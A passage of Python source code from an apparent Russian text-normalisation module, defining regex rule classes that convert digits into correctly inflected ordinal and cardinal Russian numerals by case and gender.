Родительный/дательный/творительный/предложный падеж.
Пример: "(3-й, )4-й и 5-й бригад -> (третьей, )четвёртой и пятой бригад"
"""
def __init__(self):
self.mask = (r'\b((\d+)-й, |)(\d+)-й и (\d+)-й'
r'( ([а-я]+-|)[а-я]+[иы](х|ми?) | )([а-яё]+)\b')
def check(self, m):
attr = words.get_attr(m.group(8))
if attr.have([Z_GENDER], True, [1, 2, 4, 5]):
if m.group(1):
new = ordinal(m.group(2), 'r_zh') + ', '
else:
new = ''
new += ordinal(m.group(3), 'r_zh') + ' и ' + ordinal(m.group(4), 'r_zh')
return new + m.group(5) + m.group(8)
else:
return None
class OrdinalRule_37(RuleBase):
"""
Описание: Порядковые числительные.
Пример: "2-й и 3-й блок(и) -> второй и третий блок(и)"
"""
def __init__(self):
self.mask = (
r'\b(\d+)-й( или | и )(\d+)-й( ([а-я]+([иы]й|[иы]е) |)([а-яё]+))\b')
def check(self, m):
attr = words.get_attr(m.group(7))
if attr.have([M_GENDER], None, [0]):
new = ordinal(m.group(1), 'i_mu') + m.group(2)
new += ordinal(m.group(3), 'i_mu') + m.group(4)
return new
return None
class OrdinalRule_38(RuleBase):
"""
Описание: Порядковые числительные.
Пример: "2-е и 3-е числа -> второе и третье числа"
"""
def __init__(self):
self.mask = (
r'\b(\d+)-е( или | и )(\d+)-е( ([а-я]+([ео]е|[иы]е) |)([а-яё]+))\b')
def check(self, m):
attr = words.get_attr(m.group(7))
if attr.have([S_GENDER], None, [0, 3], only_case=True):
new = ordinal(m.group(1), 'i_sr') + m.group(2)
new += ordinal(m.group(3), 'i_sr') + m.group(4)
return new
return None
class OrdinalRule_39(RuleBase):
"""
Описание: Порядковые числительные.
Пример: "2 груша -> вторая груша, 3 окно -> третье окно"
"18 день -> восемнадцатый день,
"но: 18 мегаватт, 2 дверь"
"""
def __init__(self):
self.mask = (
r'(?<![,.])\b(\d*[02-9][02-9]|\d*1\d|[2-9]) ([а-яё]+)(?!-)\b')
def check(self, m):
number = ''
attr = words.get_attr(m.group(2))
if (attr.have([M_GENDER], False, [0])
and not attr.have([M_GENDER], True, [1])
and not m.group(2) in ('грамм', 'кельвин', 'килограмм',
'миллиграмм', 'мах','парсек', 'килопарсек',
'мегапарсек', 'человек')):
number = ordinal(m.group(1), 'i_mu')
if attr.have([S_GENDER], False, [0]):
number = ordinal(m.group(1), 'i_sr')
if (attr.have([Z_GENDER], False, [0]) and not attr.have(case=[3])
and m.group(2) != 'полка'):
number = ordinal(m.group(1), 'i_zh')
if number:
return number + ' ' + m.group(2)
return None
class OrdinalRule_4(RuleBase):
"""
Описание: Порядковые числительные.
Именительный мужского рода.
Творительный/предложный падеж мужского/среднего рода.
Родительный/дательный/творительный/предложный падеж женского рода.
Пример: "на 8-м этаже -> на восьмом этаже"
"""
def __init__(self):
self.mask = (r'\b(\d+)-(м|й) ([А-Я]?[а-яё]+)\b')
def check(self, m):
number = ''
attr = words.get_attr(m.group(3).lower())
if m.group(2) == 'м':
if attr.have([M_GENDER, S_GENDER], False, [4]):
number = ordinal(m.group(1), 't_mu')
elif (attr.have([M_GENDER, S_GENDER], False, [5])
or m.group(3) in ('берегу', 'бою', 'году', 'лесу', 'полку',
'пруду', 'саду', 'углу', 'шкафу')):
number = ordinal(m.group(1), 'p_mu')
else:
if attr.have([M_GENDER], False, [0]):
number = ordinal(m.group(1), 'i_mu')
elif attr.have([Z_GENDER], False, [1, 2, 4, 5]):
number = ordinal(m.group(1), 't_zh')
if number:
return number + ' ' + m.group(3)
return None
class OrdinalRule_6(RuleBase):
"""
Описание: Порядковые числительные.
Пример:
"""
def __init__(self):
self.mask = (r'\b(\d+)-е (([а-яё]+[ео]е ){,2}([А-Я]?[а-яё]+[ео]))\b')
def check(self, m):
if words.have(m.group(4).lower(), [S_GENDER], False, [0, 3]):
return ordinal(m.group(1), 'i_sr') + ' ' + m.group(2)
return None
class OrdinalRule_8(RuleBase):
"""
Описание: Порядковые числительные. Винительный падеж. Женский род.
Пример: "102 школу -> сто вторую школу"
"""
def __init__(self):
self.mask = (r'(?<![,.])\b(\d*11|\d*[02-9]) ([а-яё]{2,})\b')
def check(self, m):
attr = words.get_attr(m.group(2))
if attr.have([Z_GENDER], False, [3]) and not attr.have(case=[0]):
if m.group(1)[-1] == '3':
new = ordinal(m.group(1), 'r_mu')[:-3] + 'ю '
else:
new = ordinal(m.group(1), 'r_mu')[:-3] + 'ую '
new += m.group(2)
return new
return None
class OrdinalRule_9(RuleBase):
"""
Описание: Порядковые числительные. Родительный падеж.
Пример: "5 этажа -> пятого этажа, 6 школы -> шестой школы"
"""
def __init__(self):
self.mask = (
r'(\A|\n|\(| )(\d*[02-9][05-9]|\d*1\d|[5-9]) ([А-Я]?[а-яё]{2,})\b')
def check(self, m):
number = ''
attr = words.get_attr(m.group(3).lower())
if attr.have([M_GENDER, S_GENDER], False, [1]):
number = ordinal(m.group(2), 'r_mu')
if attr.have([Z_GENDER], False, [1]):
number = ordinal(m.group(2), 'r_zh')
if number:
return m.group(1) + number + ' ' + m.group(3)
else:
return None
class OrdinalRule_5(RuleBase):
"""
Описание: Порядковые числительные. Дательный падеж.
Пример: "23 дню -> двадцать третьему дню"
"""
def __init__(self):
self.mask = (
r'(\A|\n|\(| )(\d*[02-9][02-9]|\d*1\d|[2-9]) ([а-яё]{2,})\b')
def check(self, m):
number = ''
attr = words.get_attr(m.group(3))
if attr.have([M_GENDER, S_GENDER], False, [2]):
number = ordinal(m.group(2), 'd_mu')
if (attr.have([Z_GENDER], False, [2])
and not attr.have([Z_GENDER], False, [1, 5], all_case=True)):
number = ordinal(m.group(2), 'd_zh')
if number:
return m.group(1) + number + ' ' + m.group(3)
else:
return None
class CardinalRule_10(RuleBase):
"""
Описание: Количественные числительные.
Прилагательные, в состав которых входят числительные.
Пример: (3-кратный и т.п.)
"""
def __init__(self):
self.mask = (r'(?<![,.-])\b((\d+) - |)(\d+)-(,? |[а-яё]{5,}\b)')
def check(self, m):
if m.group(1) == '':
pre = ''
else:
if m.group(2)[-3:] == '000':
pre = cardinal(m.group(2)[:-3], r_ca) + 'тысяче - '
else:
pre = cardinal(m.group(2), r_ca) + ' - '
if m.group(3)[-3:] == '000':
num = cardinal(m.group(3)[:-3], r_ca) + 'тысяче'
else:
num = cardinal(m.group(3), r_ca)
num = pre + num
num = sub('ста', 'сто', num)
num = sub(r'(одной тысячи|одноготысяче)', 'тысяче', num)
num = sub(r'\bодного', 'одно', num)
return num + m.group(4)
class CardinalRule_11(RuleBase):
"""
Описание: Количественные числительные. Родительный падеж.
Пример:
"""
def __init__(self):
self.mask = (
r'\b([Оо]т|[Сс]о?)'
r'( почти | примерно | приблизительно | плюс | минус | )'
r'((\d+,|)(\d+)( [-и] | или )|)(\d+,|)(\d+)( ([а-яё]+ |)[а-яё]+ | )'
r'('
r'до( [а-яё]+([иы]х|[ео]й|[ео]го) '
r'| почти | примерно | приблизительно | плюс | минус | )'
r'((\d+,|)\d+( [-и] | или )|)(\d+,|)\d+'
r'( ([а-яё]+([иы]х|[ео]й|[ео]го) |и более |и менее |)([а-яё]+)|)'
r')\b')
def check(self, m):
if m.group(3):
if m.group(4):
pre = decimal(m.group(4)[:-1], m.group(5), 1)
else:
pre = cardinal(m.group(5), r_ca)
if pre[-6:] == 'одного' and m.group(21) is not None:
if words.have(m.group(21), [Z_GENDER], None, [1]):
pre = pre[:-2] + 'й'
elif m.group(21) == 'суток':
pre = pre[:-3] + 'их'
pre += m.group(6)
else:
pre = ''
if m.group(7):
number = decimal(m.group(7)[:-1], m.group(8), 1)
else:
number = cardinal(m.group(8), r_ca)
if number[-6:] == 'одного' and m.group(21) is not None:
if words.have(m.group(21), [Z_GENDER], None, [1]):
number = number[:-2] + 'й'
elif m.group(21) == 'суток':
number = number[:-3] + 'их'
return m.group(1) + m.group(2) + pre + number + m.group(9) + m.group(11)
class CardinalRule_12(RuleBase):
"""
Описание: Количественные числительные.
Родительный падеж второго числительного в конструкции.
Пример: "числительное + существительное + вместо/из/против + числительное"
"""
def __init__(self):
self.mask = (
r'\b((\d+ )([а-яё]{3,})( вместо | из | против ))(\d+,|)(\d+)\b')
def check(self, m):
attr = words.get_attr(m.group(3))
if m.group(5):
number = decimal(m.group(5)[:-1], m.group(6), 1)
else:
number = cardinal(m.group(6), r_ca)
day_forms = ('сутки', 'суток', 'суткам', 'сутками', 'сутках')
if condition(m.group(6)) and attr.have([Z_GENDER]):
number = number[:-2] + 'й'
elif number[-6:] == 'одного' and m.group(3) in day_forms:
number = number[:-3] + 'их'
return m.group(1) + number
class CardinalRule_13(RuleBase):
"""
Описание: Количественные числительные.
Пример:
"""
def __init__(self):
self.mask = (
r'\b('
r'[Бб]олее|[Мм]енее|[Бб]ольше|[Мм]еньше|[Вв]ыше|[Нн]иже|'
r'[Дд][ао]льше|[Дд]ороже|[Дд]ешевле|[Оо]коло|[Сс]выше|[Сс]реди|'
r'[Дд]ля|[Дд]о|[Ии]з|[Оо]т|[Бб]ез|[Уу]|[Вв]место|[Вв] возрасте'
r'[Бб]лиже|[Вв] количестве|[Вв] пределах|[Вв] течение|[Дд]линнее|'
r'[Вв] размере|[Нн]ач[инаетялсьо]{2,7} с|[Пп]орядка|[Пп]осле|'
r'[Дд]ости[гчаетья]{1,4}|[Дд]остига?л[аио]?|[Дд]остигн[еуть]{2,3}|'
r'[Дд]остигши[еймх]|[Дд]остигавши[еймх]|[Дд]остигш[аеигмоуя]{2,3}|'
r'[Дд]остигавш[аеигмоуя]{2,3}|[Дд]остигше[ейм|[Дд]остигавше[ейм]|'
r'[Вв]ладел[аеимухцыь]{2,5}|[Вв]нутри|[Вв] районе|[Нн]а уровне|'
r'[Пп]ротив|[Сс]тарше|[Мм]оложе|[Кк]роме|[Пп]омимо|[Рр]анее|'
r'[Нн]а протяжении|[Нн]е превы[сш][аи][авеийолтшщюья]{1,4}'
r')'
r'( приблизительно | примерно | почти | более чем | менее чем '
r'| плюс | минус | максимум | минимум | )'
r'((\d+,|)(\d+)( - | или )|)(\d+,|)(\d+)'
r'( ([а-яё]+([иы]х|[ео]й|[ео]го) |и более |и менее |)'
r'([а-яё]{3,})|(?!-))\b')
def check(self, m):
if m.group(3):
if m.group(4):
pre = decimal(m.group(4)[:-1], m.group(5), 1)
else:
pre = cardinal(m.group(5), r_ca)
if condition(m.group(5)) and m.group(12) is not None:
attr = words.get_attr(m.group(12))
if m.group(9) and attr.have([Z_GENDER], None, [1]):
pre = pre[:-2] + 'й'
elif m.group(12) == 'суток':
pre = pre[:-3] + 'их'
pre += m.group(6)
else:
pre = ''
if m.group(7):
number = decimal(m.group(7)[:-1], m.group(8), 1)
else:
number = cardinal(m.group(8), r_ca)
if m.group(12) and condition(m.group(8)):
attr = words.get_attr(m.group(12))
if attr.have(Z_GENDER, False, [1]):
number = number[:-2] + 'й'
elif m.group(12) == 'суток':
number = number[:-3] + 'их'
elif m.group(3) and condition(m.group(8)):
if m.group(3)[-1:] == 'й':
number = number[:-2] + 'й'
elif m.group(3)[-1:] == 'х':
number = number[:-3] + 'их'
new = m.group(1) + m.group(2) + pre + number + m.group(9)
return new
class CardinalRule_14(RuleBase):
"""
Описание: Количественные числительные. Предлог "с" + родительный падеж.
Пример:
"""
def __init__(self):
self.mask = (r'\b([Сс]о?'
r'( всех | [а-яё]+[иы]х | примерно | приблизительно '
r'| почти | плюс | минус | ))'
r'((\d+)( [-и] | или )|)(\d+)'
r'(( [а-яё]+([иы]х|[ео]й|[ео]го)|) ([а-яё]+))\b')
def check(self, m):
attr = words.get_attr(m.group(10))
if attr.have(None, None, [1]):
if m.group(3):
prenum = cardinal(m.group(4), r_ca)
if condition(m.group(4)) and attr.have([Z_GENDER], None, [1]):
prenum = prenum[:-2] + 'й'
prenum += m.group(5)
else:
prenum = ''
prenum = m.group(1) + prenum
number = cardinal(m.group(6), r_ca)
if attr.have([Z_GENDER], False, [1]):
number = number[:-2] + 'й'
return prenum + number + m.group(7)
return None
class CardinalRule_15(RuleBase):
"""
Описание: Количественные числительные. Родительный падеж.
Пример:
"""
def __init__(self):
self.mask = (
r'(\A|\n|\(| )((\d+) - |)(1|\d*[02-9]1)'
r'(( [а-яё]+[ео]го | )([а-яё]+))\b')
def check(self, m):
attr = words.get_attr(m.group(7))
a = attr.have([M_GENDER, S_GENDER], False, [1])
b = attr.have([M_GENDER], False, [3])
c = attr.have([Z_GENDER], False, [1])
if (a and not b) or c:
number = cardinal(m.group(4), r_ca)
if c:
number = number[:-2] + 'й'
if m.group(2) == '':
pre = ''
else:
pre = cardinal(m.group(3), r_ca)
pre += ' - '
return m.group(1) + pre + number + m.group(5)
return None
class CardinalRule_16(RuleBase):
"""
Описание: Количественные числительные. Родительный падеж.
Пример: "3 дней -> трёх дней"
"""
def __init__(self):
self.mask = (
r'(?<![,.])\b((\d+)( [-и] | или )|)'
r'(\d*[02-9][234]|[234])(( [а-яё]+[иы]х | )([А-Я]?[а-яё]+))\b')
def check(self, m):
attr = words.get_attr(m.group(7).lower())
a = attr.have([M_GENDER, S_GENDER, Z_GENDER], True, [1])
b = m.group(7) in ('лет', 'человек')
c = attr.have([M_GENDER], True, [5])
if (a or b) and not c:
if m.group(1):
number = cardinal(m.group(2), r_ca)
if attr.have(gender=Z_GENDER) and number[-2:] == 'го':
number = number[:-2] + 'й'
number += m.group(3)
else:
number = ''
return number + cardinal(m.group(4), r_ca) + m.group(5)
return None
class CardinalRule_17(RuleBase):
"""
Описание: Количественные числительные. Творительный падеж. Исключение.
Пример:
"""
def __init__(self):
self.mask = (
r'\b((состав(ил[аио]?|[ия]т|ля[ею]т)|потеря(л[аио]?|[ею]т)) \d+) '
r'(погибшими|ранеными|убитыми)'
r'(( и \d+) (погибшими|ранеными|убитыми)|)\b')
def check(self, m):
if m.group(6):
new = m.group(7) + '_ ' + m.group(8)
else:
new = ''
return m.group(1) + '_ ' + m.group(5) + new
class CardinalRule_18(RuleBase):
"""
Описание: Количественные числительные. Творительный падеж.
Пример:
"""
def __init__(self):
self.mask = (
r'\b('
r'(\d+,|)(\d+)'
r'( - | или | и (почти |приблизительно |примерно |плюс |минус |))|'
r')'
r'(\d+) ([а-яё]+([аиыья]ми|[ео]м|[еиоы]й|ью))\b')
def check(self, m):
if m.group(1):
if m.group(2):
pre = decimal(m.group(2)[:-1], m.group(3), 3)
else:
pre = cardinal(m.group(3), t_ca)
if condition(m.group(3)):
a = words.have(m.group(7), [Z_GENDER], False, [4])
b = words.have(m.group(7)[:-2], [Z_GENDER], False, [0])
c = words.have(m.group(7)[:-3] + 'ь', [Z_GENDER], False, [0])
if a or b or c:
pre = pre[:-2] + 'ой'
elif m.group(8) == 'сутками':
pre = cardinal(m.group(3), t_ca) + 'и'
pre += m.group(4)
else:
pre = ''
number = ''
if condition(m.group(6)):
attr = words.get_attr(m.group(7))
if attr.have([M_GENDER, S_GENDER], False, [4]):
number = cardinal(m.group(6), t_ca)
elif attr.have([Z_GENDER], False, [4]):
number = cardinal(m.group(6), t_ca)[:-2] + 'ой'
elif m.group(7) == 'сутками':
number = cardinal(m.group(6), t_ca) + 'и'
elif m.group(7)[-2:] == 'ми' and m.group(1):
number = cardinal(m.group(6), t_ca)
if attr.have([Z_GENDER], True, [4]):
number = cardinal(m.group(6), t_ca)[:-2] + 'ой'
elif m.group(7)[-2:] == 'ми':
number = cardinal(m.group(6), t_ca)
if number:
return pre + number + ' ' + m.group(7)
return None
class CardinalRule_19(RuleBase):
"""
Описание: Количественные числительные. Предлоги творительного падежа.
Пример:
"""
def __init__(self):
self.mask = (
r'\b(([Мм]ежду|[Нн]ад|[Пп]еред|'
r'[Пп]о сравнению со?|[Вв] сравнении со?) '
r'(более чем |почти |приблизительно |примерно |плюс |минус |))'
r'((\d+,|)(\d+)'
r'( [-и] | или )'
r'(почти |приблизительно |примерно |плюс |минус |)|)'
r'(\d+,|)(\d+)\b(?!-)')
def check(self, m):
pre = m.group(1)
if m.group(4):
if m.group(5):
pre += decimal(m.group(5)[:-1], m.group(6), 3)
else:
pre += cardinal(m.group(6), t_ca)
pre = pre + m.group(7) + m.group(8)
if m.group(9):
number = decimal(m.group(9)[:-1], m.group(10), 3)
else:
number = cardinal(m.group(10), t_ca)
return pre + number
class CardinalRule_20(RuleBase):
"""
Описание: Количественные числительные. Предложный падеж.
Пример:
"""
def __init__(self):
self.mask = (
r'(?<= )((\d+,|)(\d+)( [-и] | или )'
r'(около |почти |примерно |приблизительно |плюс |минус |'
r'более чем |менее чем |)|)'
r'(\d+)( ([а-яё]+([иы]х|[ео][йм]) |с небольшим |)([а-яё]{3,}))\b')
def check(self, m):
attr = words.get_attr(m.group(10))
if attr.have(None, None, [5], only_case=True) or m.group(10) == 'сутках':
if m.group(1):
if m.group(2):
pre = decimal(m.group(2)[:-1], m.group(3), 4)
else:
pre = cardinal(m.group(3), p_ca)
a = attr.have(m.group(10), None, False, [2, 5])
b = attr.have(m.group(10)[:-1] + 'м', [Z_GENDER], True, [2])
if condition(m.group(3)) and (a or b):
pre = pre[:-1] + 'й'
elif condition(m.group(3)) and m.group(10) == 'сутках':
pre = pre[:-2] + 'их'
pre += m.group(4) + m.group(5)
else:
pre = ''
if condition(m.group(6)):
if attr.have([M_GENDER, S_GENDER], False, [5]):
number = cardinal(m.group(6), p_ca)
elif attr.have([Z_GENDER], False, [2, 5]):
number = cardinal(m.group(6), p_ca)[:-1] + 'й'
elif m.group(10) == 'сутках':
number = cardinal(m.group(6), p_ca)[:-2] + 'их'
else:
return None
else:
number = cardinal(m.group(6), p_ca)
return pre + number + m.group(7)
else:
return None
class CardinalRule_22(RuleBase):
"""
Описание: Количественные числительные. Предлоги предложного падежа.
Пример:
"""
def __init__(self):
self.mask = (
r'\b(([Оо]б?|[Пп]ри)( минус| плюс| более чем| менее чем|))'
r'( (\d+,|)(\d+)( ([-и]|или)( минус| плюс|) )| )'
r'(\d+,|)(\d+)(?!-)\b')
def check(self, m):
number = ' '
if m.group(4) != ' ':
if m.group(5):
number += decimal(m.group(5)[:-1], m.group(6), 4)
else:
number += cardinal(m.group(6), p_ca)
number += m.group(7)
if m.group(10):
number += decimal(m.group(10)[:-1], m.group(11), 4)
else:
number += cardinal(m.group(11), p_ca)
return m.group(1) + number
class CardinalRule_23(RuleBase):
"""
Описание: Количественные числительные. Винительный падеж. Десятичные дроби.
Пример:
"""
def __init__(self):
self.mask = (
r'\b(([А-Яа-яЁё]{3,}) '
r'(всего |ориентировочно |примерно |приблизительно |почти |'
r'более чем |не более чем |)в )'
r'((\d+,|)(\d+) - |)(\d+),(\d+)\b')
def check(self, m):
preacc = sub('ё', 'е', m.group(2).lower())
if preacc in pre_acc:
new = m.group(1)
if m.group(4):
if m.group(5):
new += decimal(m.group(5)[:-1], m.group(6), 5)
else:
new += m.group(6)
new += ' - '
new += decimal(m.group(7), m.group(8), 5)
return new
return None
class CardinalRule_24(RuleBase):
"""
Описание: Количественные числительные.
Винительный падеж мужского рода числительных,
оканчивающихся на 1, кроме 11.
Пример:
"""
def __init__(self):
self.mask = (
r'(\A|\n|\(| )((\d+) - |)(1|\d*[02-9]1)'
r'(( [а-яё]+[ео]го | )([а-яё]+))\b')
def check(self, m):
attr = words.get_attr(m.group(7))
if (attr.have([M_GENDER], False, [3])
and not attr.have([M_GENDER], False, [0])):
number = cardinal(m.group(4), v_ca)[:-2] + 'ного'
if m.group(2) == '':
pre = ''
else:
pre = cardinal(m.group(3), v_ca)
if condition(m.group(3)):
pre = pre[:-2] + 'ного'
elif pre[-3:] == 'два':
pre = pre[:-1] + 'ух'
elif pre[-3:] == 'три' or pre[-3:] == 'ыре':
pre = pre[:-1] + 'ёх'
pre += ' - '
return m.group(1) + pre + number + m.group(5)
return None
class CardinalRule_25(RuleBase):
"""
Описание: Количественные числительные. Винительный падежи.
Пример:
"""
def __init__(self):
self.mask = (
r'\b([Вв]|[Нн]а|[Зз]а|[Пп]ро|[Сс]пустя|[Чч]ерез)'
r'( (\d+,|)(\d+)( -| или)|) (\d+,|)(\d+)'
r'(( [а-яё]+([ая]я|[ую]ю|[еиоы]е|[иы][йх]) | )([а-яё]+))\b')
def check(self, m):
attr = words.get_attr(m.group(11))
a = attr.have([M_GENDER], False, [3])
b = attr.have([M_GENDER], False, [0])
c = a and not b
d = attr.have([Z_GENDER], False, [1, 3])
e = attr.have([Z_GENDER], True, [1])
f = d or e
g = attr.have([S_GENDER], False, [0, 1])
h = attr.have([S_GENDER], True, [1])
i = attr.have([M_GENDER, Z_GENDER], True, [1, 3], all_case=True)
if m.group(6):
if (attr.have([M_GENDER, S_GENDER, Z_GENDER], None, [1])
or m.group(11) in ('суток', 'лет')):
number = decimal(m.group(6)[:-1], m.group(7), 5)
else:
return None
else:
number = cardinal(m.group(7), v_ca)
if attr.have([M_GENDER], False, [0, 3], all_case=True):
pass
elif number[-3:] == 'дин':
if m.group(11) in ('сутки', 'брюки', 'ножницы'):
number = number[:-2] + 'ни'
elif c:
number = number[:-2] + 'ного'
elif attr.have([Z_GENDER], False, [3]):
number = number[:-2] + 'ну'
elif attr.have([S_GENDER], False, [0, 3]):
number = number[:-2] + 'но'
else:
return None
elif number[-3:] == 'два':
if m.group(11) in ('суток', 'брюк', 'ножниц'):
number = number[:-1] + 'ое'
elif m.group(11) in ('сутки', 'брюки', 'ножницы'):
return None
elif attr.have([M_GENDER, Z_GENDER], True, [1]):
number = number[:-1] + 'ух'
elif attr.have([Z_GENDER], False, [1]):
number = number[:-1] + 'е'
elif number[-3:] == 'три':
if m.group(11) in ('суток', 'брюк', 'ножниц'):
number = number[:-1] + 'ое'
elif i:
number = number[:-1] + 'ёх'
elif m.group(11) in ('сутки', 'брюки', 'ножницы'):
return None
else:
pass
elif number[-3:] == 'ыре':
if m.group(11) in ('суток', 'брюк', 'ножниц'):
number = number[:-3] + 'веро'
elif i:
number = number[:-1] + 'ёх'
elif m.group(11) in ('сутки', 'брюки', 'ножницы'):
return None
else:
pass
elif (attr.have([M_GENDER, S_GENDER, Z_GENDER], True, [1])
or m.group(11) in ('суток', 'лет')):
pass
else:
return None
if m.group(2):
if m.group(3):
pre = decimal(m.group(3)[:-1], m.group(4), 5)
else:
pre = cardinal(m.group(4), v_ca)
if pre[-3:] == 'дин':
if m.group(11) in ('сутки', 'суток', 'брюки', 'брюк',
'ножницы', 'ножниц'):
pre = pre[:-2] + 'ни'
elif (attr.have([M_GENDER], False, [1, 3], all_case=True)
or attr.have([M_GENDER], True, [1, 3], all_case=True)):
pre = pre[:-2] + 'ного'
elif f:
pre = pre[:-2] + 'ну'
elif g or h:
pre = pre[:-2] + 'но'
elif pre == 'два':
if m.group(11) in ('сутки', 'суток', 'брюки', 'брюк',
'ножницы', 'ножниц'):
pre = pre[:-1] + 'ое'
elif (c or attr.have([M_GENDER, Z_GENDER], True, [1, 3],
all_case=True)):
pre = pre[:-1] + 'ух'
elif f:
pre = pre[:-1] + 'е'
elif pre == 'три':
if m.group(11) in ('сутки', 'суток', 'брюки', 'брюк',
'ножницы', 'ножниц'):
pre = pre[:-1] + 'ое'
elif (c or attr.have([M_GENDER, Z_GENDER], True, [1, 3],
all_case=True)):
pre = pre[:-1] + 'ёх'
elif pre == 'четыре':
if m.group(11) in ('сутки', 'суток', 'брюки', 'брюк',
'ножницы', 'ножниц'):
pre = pre[:-3] + 'веро'
elif (attr.have([M_GENDER, Z_GENDER], True, [1, 3],
all_case=True)):
pre = pre[:-1] + 'ёх'
pre += m.group(5) + ' '
else:
pre = ''
return m.group(1) + ' ' + pre + number + m.group(8)
class CardinalRule_27(RuleBase):
"""
Описание: Количественные числительные.
Винительный падеж женского рода.
Пример:
"""
def __init__(self):
self.mask = (
r'(?<![,.])\b(\d*[02-9]1|1)'
r'(( [а-яё]+[ую]ю | с половиной | с лишним | )([а-яё]+))')
def check(self, m):
if words.have(m.group(4), [Z_GENDER], False, [3]):
return cardinal(m.group(1), v_ca)[:-2] + 'ну' + m.group(2)
return None
class CardinalRule_28(RuleBase):
"""
Описание: Количественные числительные.
Средний род (именительный/винительный падежи).
Пример:
"""
def __init__(self):
self.mask = (
r'(?<![,.])\b((\d+)( [-и] | или )|)(\d+)'
r'( ([а-яё]+([ео]е|[иы]х) |)([а-яё]+))\b')
def check(self, m):
if (words.have(m.group(8), [S_GENDER], False, [0, 1])
or words.have(m.group(8), [S_GENDER], True, [1])):
if m.group(1):
if condition(m.group(2)):
if len(m.group(2)) > 1:
pre = m.group(2)[:-1] + '0 одно'
else:
pre = 'одно'
else:
pre = m.group(2)
pre += m.group(3)
else:
pre = ''
if condition(m.group(4)):
if len(m.group(4)) > 1:
number = m.group(4)[:-1] + '0 одно'
else:
number = 'одно'
else:
number = m.group(4)
return pre + number + m.group(5)
else:
return None
class CardinalRule_29(RuleBase):
"""
Описание: Количественные числительные.
Женский род (именительный/винительный падежи).
Пример:
"""
def __init__(self):
self.mask = (
r'(\A|\n|\(| )(((\d+)( - | или | и ))|)(\d+,|)(\d+)'
r'((( [а-яё]+([ая]я|[иы][ех]))+'
r'| с половиной| с лишним|) ([а-яё]+))')
def check(self, m):
attr = words.get_attr(m.group(12))
a = attr.have([Z_GENDER], None, [1])
b = attr.have([Z_GENDER], False, [0]) and condition(m.group(7))
if (a or b):
new = m.group(1)
if m.group(2):
new += feminin(m.group(4)) + m.group(5)
if m.group(6):
new += m.group(6) + m.group(7) + m.group(8)
elif a and condition(m.group(7)):
return None
else:
new += feminin(m.group(7)) + m.group(8)
return new
return None
class CardinalRule_30(RuleBase):
"""
Описание: Количественные числительные. Дательный падеж.
Пример:
"""
def __init__(self):
self.mask = (
r'(?<![,.])\b((\d+)( [-и] | или )|)(\d+)'
r'(( ([а-яё]+-|)[а-яё]+([иы]м|[ео]му) | )([а-яё]+([аиыя]м|у|ю|е)))\b')
def check(self, m):
if m.group(1) == '':
pre = ''
else:
pre = ' ' + cardinal(m.group(2), d_ca)
attr = words.get_attr(m.group(9))
a = attr.have([Z_GENDER], None, [2])
b = attr.have([Z_GENDER], False, [5])
if condition(m.group(2)) and (a or b):
pre = pre[:-2] + 'й'
elif m.group(9) == 'суткам':
pre = pre[:-3] + 'им'
pre += m.group(3)
number = ''
if condition(m.group(4)):
if words.have(m.group(9), [M_GENDER, S_GENDER], False, [2]):
number = cardinal(m.group(4), d_ca)
elif words.have(m.group(9), [Z_GENDER], False, [2, 5]):
number = cardinal(m.group(4), d_ca)[:-2] + 'й'
elif m.group(8) == 'суткам':
number = cardinal(m.group(4), d_ca)[:-3] + 'им'
# elif m.group(10) == 'ам' or m.group(10) == 'ям':
elif words.have(m.group(9), [M_GENDER, S_GENDER, Z_GENDER], True, [2]):
number = cardinal(m.group(4), d_ca)
if number:
return pre + number +m.group(5)
return None
class CardinalRule_31(RuleBase):
"""
Описание: Количественные числительные. Дательный падеж.
Пример: "к 25 -> к двадцати пяти"
"""
def __init__(self):
self.mask = (
r'\b([Кк] |рав[нагеийлмоcуюыхья]{2,6} |'
r'равносил[агеимноуыхья]{2,5} |эквивалент[аеноы]{2} )'
r'(всего |почти |примерно |приблизительно |плюс |минус |)'
r'((\d+,|)(\d+)( [-и] | или )|)(\d+,|)(\d+)\b(?!-)')
def check(self, m):
number = ''
if m.group(3):
if m.group(4):
number += decimal(m.group(4)[:-1], m.group(5), 2)
else:
number += cardinal(m.group(5), d_ca)
number += m.group(6)
if m.group(7):
number += decimal(m.group(7)[:-1], m.group(8), 2)
else:
number += cardinal(m.group(8), d_ca)
return m.group(1) + m.group(2) + number
class CardinalRule_35(RuleBase):
"""
Описание: Количественные числительные.
Предлог "по" при указании количества с десятичной дробью.
Пример:
"""
def __init__(self):
self.mask = (r'\b([Пп]о )(\d+),(\d+)\b')
def check(self, m):
if condition(m.group(2)) or condition(m.group(3)):
new = m.group(1) + decimal(m.group(2), m.group(3), 2)
return new
else:
return None
class Rule_1(RuleBase):
"""
Описание: Буква Ё.
Пример: "все небо" -> "всё небо"
"""
def __init__(self):
self.mask = (r'\b([Вв]с)е ([а-яё]+)\b')
def check(self, m):
if words.have(m.group(2), [S_GENDER], False, [0, 3]):
return m.group(1) + 'ё ' + m.group(2)
return None
class CardinalRule_26(RuleBase):
"""
Описание: Количественные числительные. Предложный падеж.
Пример: "в 21 принадлежащей -> в двадцати одной принадлежащей"
"""
def __init__(self):
self.mask = (r'\b([Вв] |[Нн]а |[Пп]ри |[Оо]б? )'
r'(\d*[02-9]1|1)( [а-яё]+[ео](й|м)(|ся))\b')
def check(self, m):
new = m.group(1) + cardinal(m.group(2), p_ca)
if m.group(4) == 'й':
new = new[:-1] + 'й'
return new + m.group(3)
class CardinalRule_21(RuleBase):
"""
Описание: Количественные числительные. Предложный падеж.
Пример: "в 2 из 3 случаев -> в двух из ..."
"""
def __init__(self):
self.mask = (r'\b([Вв] |[Оо] )(\d+)( из \d+ ([а-яё]+))\b')
def check(self, m):
number = cardinal(m.group(2), p_ca)
a = condition(m.group(2))
b = words.have(m.group(4), [Z_GENDER], None, [1])
if a and b:
number = number[:-1] + 'й'
new = m.group(1) + number + m.group(3)
return new
class OrdinalRule_40(RuleBase):
"""
Описание: Порядковые числительные. Дательный падеж.
Пример: "к 3 числу -> к третьему числу"
"""
def __init__(self):
self.mask = (r'\b([Кк]о? )(\d*[02-9][2-9]|\d*1\d|[2-9])'
r'( [а-я]+[ео](му|й) | )([а-яё]+)\b')
def check(self, m):
attr = words.get_attr(m.group(5))
if attr.have(None, False, [2]):
new = ordinal(m.group(2), 'd_mu')
if attr.have([Z_GENDER], False, [2]):
new = new[:-2] + 'й'
return m.group(1) + new + m.group(3) + m.group(5)
return None
class CardinalRule_36(RuleBase):
"""
Описание: Количественные числительные. Дательный падеж.
